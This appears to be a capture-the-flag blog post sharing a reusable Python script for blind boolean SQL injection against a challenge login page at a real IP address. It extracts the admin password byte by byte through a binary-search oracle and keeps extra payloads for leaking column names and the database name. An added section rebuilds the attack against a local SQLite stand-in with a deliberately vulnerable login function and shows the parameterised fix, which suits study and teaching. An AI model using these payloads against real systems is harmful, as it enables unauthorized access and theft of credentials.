I usually could not solve SQLi problems well, but now I think I have gotten a feel for them.
Leaving the blind SQLi code here for reuse.
```python
import requests

URL = 'http://54.180.124.188:8010/'
PASSWORD = '12345678'  # any value works: the injected username comments the password check out


def oracle(username):
    # Boolean oracle: login.php answers 'success' iff the injected condition is true.
    r = requests.post(f'{URL}login.php', data={
        'username': username,
        'password': PASSWORD
    })
    return 'success' in r.text


for k in range(1):              # row offset for the LIMIT clause
    print('*' * 10)
    s = []
    for j in range(1, 41):      # 1-indexed position for substr()
        start, end = 0, 255     # invariant: start <= ord(char) < end
        for i in range(30):     # safety cap; 8 rounds are enough for 0..255
            bs = (start + end) // 2
            # Other targets that were leaked with the same loop, kept for reuse:
            #   column names of freeboard.post (k+1 selects the column):
            #     f"' or (select case when ord(substr(s.column_name, {j}, 1)) >= {bs} then 1 else 0 end from information_schema.columns as s where s.table_schema='freeboard' and table_name='post' limit {k+1}, 1) -- "
            #   database name:
            #     f"' or (select case when ord(substr(database(), {j}, 1)) >= {bs} then 1 else 0 end) -- "
            username = f"' or (select case when ord(substr(s.password,{j},1)) >= {bs} then 1 else 0 end from user as s where s.username='admin' limit {k},1) -- "
            if oracle(username):
                start = bs
            else:
                end = bs
            if start == end - 1:
                # Confirm the byte with an equality check before accepting it.
                username = f"' or (select case when ord(substr(s.password,{j},1)) = {start} then 1 else 0 end from user as s where s.username='admin' limit {k},1) -- "
                if oracle(username):
                    s.append(start)
                else:
                    s.append(end)
                break
        if s[-1] <= 1:          # ord('') is 0 in MySQL: substr() ran past the end of the password
            break
    print(bytes(s))
```
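To make the trick reusable offline, here is an added example (not code from the original post or the challenge) that rebuilds the same boolean-oracle binary search against an in-memory SQLite stand-in for the challenge's `user` table. Everything in it is an assumption: the table contents, the `vulnerable_login` function standing in for `login.php`, and the use of SQLite's `unicode()` where MySQL has `ord()`. It also shows the parameterised form of the same query, against which the identical payload is just a string that matches no user.

```python
import sqlite3

# Constructed stand-in for the challenge's `user` table (assumption: the real
# target runs MySQL; SQLite's unicode() is used where MySQL has ord()).
ADMIN_PASSWORD = "Fl4g_p4ssw0rd!"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [("guest", "guest"), ("admin", ADMIN_PASSWORD)])
    return conn


def vulnerable_login(conn, username, password):
    # Models the kind of login.php the script attacks: input is concatenated
    # into the query and the only feedback is success/failure.
    query = (f"SELECT 1 FROM user WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    # Hardened form: bound parameters, so the payload never reaches the parser.
    query = "SELECT 1 FROM user WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


class Oracle:
    """Wraps a login function as a boolean oracle and counts requests."""

    def __init__(self, conn, login):
        self.conn, self.login, self.requests = conn, login, 0

    def __call__(self, username):
        self.requests += 1
        return self.login(self.conn, username, "12345678")


def ge_payload(pos, value):
    # Same shape as the post's payload: true iff code(password[pos]) >= value.
    return (f"' or (select case when unicode(substr(s.password,{pos},1)) >= {value} "
            f"then 1 else 0 end from user as s where s.username='admin' limit 0,1) -- ")


def leak_char(oracle, pos, lo=0, hi=256):
    # Binary search with the invariant lo <= code < hi; stops when hi == lo + 1.
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(ge_payload(pos, mid)):
            lo = mid
        else:
            hi = mid
    return lo


def leak_password(oracle, max_len=64):
    chars = []
    for pos in range(1, max_len + 1):
        code = leak_char(oracle, pos)
        if code == 0:
            # substr() past the end yields '': unicode('') is NULL in SQLite and
            # ord('') is 0 in MySQL, so every '>=' test fails and 0 comes back.
            break
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    o = Oracle(db, vulnerable_login)
    print(leak_password(o), "in", o.requests, "requests")
```

Each byte costs exactly eight requests for the range 0..255, plus one more round to detect the end of the string; the equality re-check in the original script is not needed when the invariant is maintained, but it is cheap insurance against a flaky oracle.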